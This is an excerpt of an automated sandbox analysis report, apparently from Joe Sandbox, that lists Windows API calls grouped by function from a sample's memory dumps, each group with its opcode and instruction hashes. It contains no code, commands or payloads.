                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3440857362-0
                                                  • Opcode ID: 525d96aedae2f7328c8ff80a8f8b1a1b05d42e9591f3cd66edf1dab37508a23d
                                                  • Instruction ID: 52bf0eac1ae0536dab6f38511bb8ed1ee05d36956438a37d2ae1e5ec9f8e51d3
                                                  • Opcode Fuzzy Hash: 525d96aedae2f7328c8ff80a8f8b1a1b05d42e9591f3cd66edf1dab37508a23d
                                                  • Instruction Fuzzy Hash: 3C516731208204AFD714EF68C881F6EB7E9FF88314F10496DF5968B2A2DB31E945DB52
                                                  APIs
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C3D927
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00C3D9AA
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C3D9C6
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00C3DA07
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C3DA21
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27896,?,?,00000000), ref: 00BC5A2C
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27896,?,?,00000000,?,?), ref: 00BC5A50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 327935632-0
                                                  • Opcode ID: ea9307ea008f67c763fd56349537a4cb2d4e249f5af2d1332dd5c34ff51023f1
                                                  • Instruction ID: db7ddd10840b83c5746764739d2913438c8fa23a6cb9aaabfe95dfa7f9de4571
                                                  • Opcode Fuzzy Hash: ea9307ea008f67c763fd56349537a4cb2d4e249f5af2d1332dd5c34ff51023f1
                                                  • Instruction Fuzzy Hash: 8C51E775A00209DFDB10EFA8D484EADB7F5FF09320B1480A9E856AB312DB31AE45CB51
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C2E61F
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C2E648
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C2E687
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C2E6AC
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C2E6B4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: d82136f75580ef190b697a67f4886001b5f6dfeb1b186833e53a54b0578793df
                                                  • Instruction ID: d65cc500a44909e683d5f3fb088cb00b38d310edcf4c01caef1ea7b436118069
                                                  • Opcode Fuzzy Hash: d82136f75580ef190b697a67f4886001b5f6dfeb1b186833e53a54b0578793df
                                                  • Instruction Fuzzy Hash: C8511835A00209DFDB01EF65C985EAEBBF5FF09314B1480A9E819AB362CB31ED51DB50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 31a25c00c7769dc2b063a89a2833b124b68611d3064af14c5e36bff36d7be24b
                                                  • Instruction ID: e488565935bd449ffd75a6d8425ec5cf653b82cbe993c950f261f1d45a8d9003
                                                  • Opcode Fuzzy Hash: 31a25c00c7769dc2b063a89a2833b124b68611d3064af14c5e36bff36d7be24b
                                                  • Instruction Fuzzy Hash: 9D41A379984114EFD724DF28CC48FADBBB8FB09320F154169F926A72E1C770AE41DA51
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C163E7
                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00C16433
                                                  • TranslateMessage.USER32(?), ref: 00C1645C
                                                  • DispatchMessageW.USER32(?), ref: 00C16466
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C16475
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                  • String ID:
                                                  • API String ID: 2108273632-0
                                                  • Opcode ID: 124c2f9dabfe0db628ebe751e2f51b1dac0ce393c1c2764ebe1f08450b69fe6f
                                                  • Instruction ID: 34b39861acc8e1fa2ebb7b53969250caf739c867aa6a1ee1125c2763a873704a
                                                  • Opcode Fuzzy Hash: 124c2f9dabfe0db628ebe751e2f51b1dac0ce393c1c2764ebe1f08450b69fe6f
                                                  • Instruction Fuzzy Hash: AC31C131940656AFDB24CFB4DC44BFA7BACAB02304F54416AE431C31A0EB7599C9EBA4
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00C18A30
                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00C18ADA
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C18AE2
                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00C18AF0
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C18AF8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: d29d2175773e6ff429d3a9e76de5ce537541f457018c31704e201fa99a824cdf
                                                  • Instruction ID: de8de30fbe02a7d292dc897c0fda9591326326a86c379a9da94f542678ff9138
                                                  • Opcode Fuzzy Hash: d29d2175773e6ff429d3a9e76de5ce537541f457018c31704e201fa99a824cdf
                                                  • Instruction Fuzzy Hash: 6731B171904219EBDB14CF68D94CBDE3BB5FF06315F108229F925E61D0C7B09A54EB90
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00C1B204
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C1B221
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C1B259
                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C1B27F
                                                  • _wcsstr.LIBCMT ref: 00C1B289
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                  • String ID:
                                                  • API String ID: 3902887630-0
                                                  • Opcode ID: 8f536c2af9b5fa66da71b61abe5d5dbbbebe7f9e856c22421762d4f8ad6c529d
                                                  • Instruction ID: db7e908b5ed8e5adc80b5fb4f647c46fadf33c37ab943fab71812b375c024fb9
                                                  • Opcode Fuzzy Hash: 8f536c2af9b5fa66da71b61abe5d5dbbbebe7f9e856c22421762d4f8ad6c529d
                                                  • Instruction Fuzzy Hash: 192128316042407AEB155B369C09FBF7B98DF4A750F01407DF804CA161EB718D81AA60
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C4B192
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C4B1B7
                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C4B1CF
                                                  • GetSystemMetrics.USER32(00000004), ref: 00C4B1F8
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C30E90,00000000), ref: 00C4B216
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 2294984445-0
                                                  • Opcode ID: a1d885e1738568357f8c686dcb822827a958ed1b4326570e29f00eb16ddcc9b3
                                                  • Instruction ID: 4010dd86a50e47daf6c6919394036358911e2e15a1d444ce6f78270b151c9499
                                                  • Opcode Fuzzy Hash: a1d885e1738568357f8c686dcb822827a958ed1b4326570e29f00eb16ddcc9b3
                                                  • Instruction Fuzzy Hash: FE218B71A10661AFCB209F399C04B6E3BA4FB06321F114B29B932D71E0E770DD219B90
                                                  APIs
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C19320
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C19352
                                                  • __itow.LIBCMT ref: 00C1936A
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C19392
                                                  • __itow.LIBCMT ref: 00C193A3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow$_memmove
                                                  • String ID:
                                                  • API String ID: 2983881199-0
                                                  • Opcode ID: 82eaa2bd0084a409c23f2061f8ec90189a7393fc21e4359052a8812e1e9ff3d3
                                                  • Instruction ID: 4479ed2db6b732e155fb0a2516c3ef5a238773a2fb97de06a285326d8fd89200
                                                  • Opcode Fuzzy Hash: 82eaa2bd0084a409c23f2061f8ec90189a7393fc21e4359052a8812e1e9ff3d3
                                                  • Instruction Fuzzy Hash: 65210735701208BBDB109A658C99FEE7BF8EF4A720F444069F954D72E0DAB0CE81A791
                                                  APIs
                                                  • IsWindow.USER32(00000000), ref: 00C35A6E
                                                  • GetForegroundWindow.USER32 ref: 00C35A85
                                                  • GetDC.USER32(00000000), ref: 00C35AC1
                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00C35ACD
                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00C35B08
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$ForegroundPixelRelease
                                                  • String ID:
                                                  • API String ID: 4156661090-0
                                                  • Opcode ID: a2fdce6e3bddf0b871ca8340d6d669a09c6e66c5d4b7dc830b901d07a506ddb0
                                                  • Instruction ID: e8196613b0df86bc5a27bd39e2adf1c09884d6a34d83c80a32084cb7e49be038
                                                  • Opcode Fuzzy Hash: a2fdce6e3bddf0b871ca8340d6d669a09c6e66c5d4b7dc830b901d07a506ddb0
                                                  • Instruction Fuzzy Hash: 5A219F35A00204AFD700EF65D888BAEBBE5FF49310F15807DF84997362CA30AD41DB90
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC134D
                                                  • SelectObject.GDI32(?,00000000), ref: 00BC135C
                                                  • BeginPath.GDI32(?), ref: 00BC1373
                                                  • SelectObject.GDI32(?,00000000), ref: 00BC139C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: 37cc6aa27cd599e3212161554bee028202c51fd525c70307b58690dbaa4fd7c2
                                                  • Instruction ID: 15779a461a85e101833e564d818cabe2459c881db643da874f8bbaefd1358ef4
                                                  • Opcode Fuzzy Hash: 37cc6aa27cd599e3212161554bee028202c51fd525c70307b58690dbaa4fd7c2
                                                  • Instruction Fuzzy Hash: A4216D30840648EFDB108F69DC48B6D7BE8FB42325F14466BF810A61F1D7B09896DF98
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 3752829d81df0de349c84aefdcb6300a38fc1f5375c5ea8869ca4dc2e0d11790
                                                  • Instruction ID: 5f605bf9ed08dfc090d10b857938be73d1864af03ab0d5ff6fa09c11a8870187
                                                  • Opcode Fuzzy Hash: 3752829d81df0de349c84aefdcb6300a38fc1f5375c5ea8869ca4dc2e0d11790
                                                  • Instruction Fuzzy Hash: 0401F9722001097BE2046A1B6D52FFBB3ACDE53388B144460FD0596343FB20EE94AAE4
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C24ABA
                                                  • __beginthreadex.LIBCMT ref: 00C24AD8
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00C24AED
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C24B03
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C24B0A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                  • String ID:
                                                  • API String ID: 3824534824-0
                                                  • Opcode ID: 80a7bd77db3916d9605e2965d435ebb0fb61eaf55563284a400701ba70b2918f
                                                  • Instruction ID: 99fd054dd5ecce1afaa3464727a46a205d95700cd6db00957db361381cd4dc8e
                                                  • Opcode Fuzzy Hash: 80a7bd77db3916d9605e2965d435ebb0fb61eaf55563284a400701ba70b2918f
                                                  • Instruction Fuzzy Hash: 3F11047AD04669FBC7058FA8AC08BDF7FACEB45320F144269F824D3250DAB1C9048BA1
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C1821E
                                                  • GetLastError.KERNEL32(?,00C17CE2,?,?,?), ref: 00C18228
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00C17CE2,?,?,?), ref: 00C18237
                                                  • HeapAlloc.KERNEL32(00000000,?,00C17CE2,?,?,?), ref: 00C1823E
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C18255
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: 5a8c03583b7987dda8a71592d1b44100ef53a55da319621f2e7891be090786af
                                                  • Instruction ID: 1d8cf2904a740f777530b7a46affc992b1dbdf34b69b2391932b750850d6c2fa
                                                  • Opcode Fuzzy Hash: 5a8c03583b7987dda8a71592d1b44100ef53a55da319621f2e7891be090786af
                                                  • Instruction Fuzzy Hash: 00014675604204AFDB214FA6DC48EAF7FACFF8B754B600429FD59C2260DA318D46DA60
                                                  APIs
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?,?,00C17455), ref: 00C17127
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?), ref: 00C17142
                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?), ref: 00C17150
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?), ref: 00C17160
                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?), ref: 00C1716C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  • Opcode ID: 184b3afd30ade610c25073702db372630be399888af3398b6c6e17fccc370555
                                                  • Instruction ID: bc260588dc977b0b51bf0389e822ba3e404f070d652d58db383d2a5da3a7ed40
                                                  • Opcode Fuzzy Hash: 184b3afd30ade610c25073702db372630be399888af3398b6c6e17fccc370555
                                                  • Instruction Fuzzy Hash: 2E018476601204BBDB114F64DC44BAE7BBDFF46751F240168FD09D6220D771DD82A7A0
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C25260
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C2526E
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C25276
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C25280
                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C252BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: edd16b99a356b5342f6a07e39deea2da8e7ca2ec03e4a16d42e4500b2f16956f
                                                  • Instruction ID: 1a135383ff27b8b82d32200aa882ffa1ec011fdea7f9bae49aca45b8144ea737
                                                  • Opcode Fuzzy Hash: edd16b99a356b5342f6a07e39deea2da8e7ca2ec03e4a16d42e4500b2f16956f
                                                  • Instruction Fuzzy Hash: E0015735D01A2DDBCF00EFE5E848BEEBBB8BB0A711F41005AE951F2180CB70955187A1
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C18121
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C1812B
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C1813A
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18141
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18157
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
